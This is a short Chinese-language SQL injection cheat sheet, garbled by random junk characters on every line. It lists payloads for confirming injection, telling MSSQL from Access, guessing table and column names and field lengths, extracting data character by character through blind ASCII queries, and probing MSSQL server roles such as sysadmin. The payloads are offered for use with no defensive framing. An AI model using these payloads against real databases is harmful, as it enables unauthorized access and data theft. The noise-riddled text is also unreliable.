1.判断是否有注入;and 1=1 ;and 1=2 h KZ<PwBi
2.初步判断是否是mssql ;and user>0 NU>'$s
lT`y=qR|
3.注入参数是字符'and [查询条件] and ''=' C-vFl[@a0
: h"Bf@3
4.搜索时没过滤参数的'and [查询条件] and '%25'=' sZ-A~X@g
~1_v;LhH5+
5.判断数据库系统 k&|#(1CFY
<{t*yMr
;and (select count(*) from sysobjects)>0 mssql XXx]~m
P^wDt14>
;and (select count(*) from msysobjects)>0 access T#HW{3
]c67zyX=%
D*!UB5<>/t
I}?+>cf
6.猜数据库 ;and (select Count(*) from [数据库名])>0 5_|Sm=
XZ|%9#6
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 *wSz2o),
\yQs[l%J
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ~9[^abz
?+Q?K30:
9.(1)猜字段的ascii值(access) cph&\
V2jt
SFj:|S=v6j
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 #@quuiYq
w1#1s|
(2)猜字段的ascii值(mssql) [iT*L)R4
m$ubxI)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 !Zr 9t|_
@X$~{Vp__
10.测试权限结构(mssql) /o$C=fDF
riy@n<Z4
~>j5z&:&
n86=1G:%
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ZQY]c
a9+l:c@
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- <Mt>v2a3Y
r5 k{mV+
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- EFZ]|Z7
&l&B[s6[
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- :1O49g3R
n7CwGN%
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- )BJ Z{E*
Eku+&